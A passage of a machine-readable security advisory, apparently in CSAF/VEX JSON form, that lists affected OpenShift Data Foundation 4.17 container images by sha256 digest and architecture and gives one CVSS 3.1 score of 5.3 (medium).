"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
